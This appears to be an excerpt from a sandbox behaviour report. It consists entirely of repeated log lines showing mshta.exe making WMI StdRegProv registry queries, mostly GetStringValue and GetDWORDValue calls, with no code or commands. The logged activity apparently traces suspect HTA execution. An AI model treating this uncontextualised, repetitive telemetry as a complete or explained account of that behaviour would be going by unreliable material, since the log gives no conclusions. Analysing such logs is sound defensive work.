Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
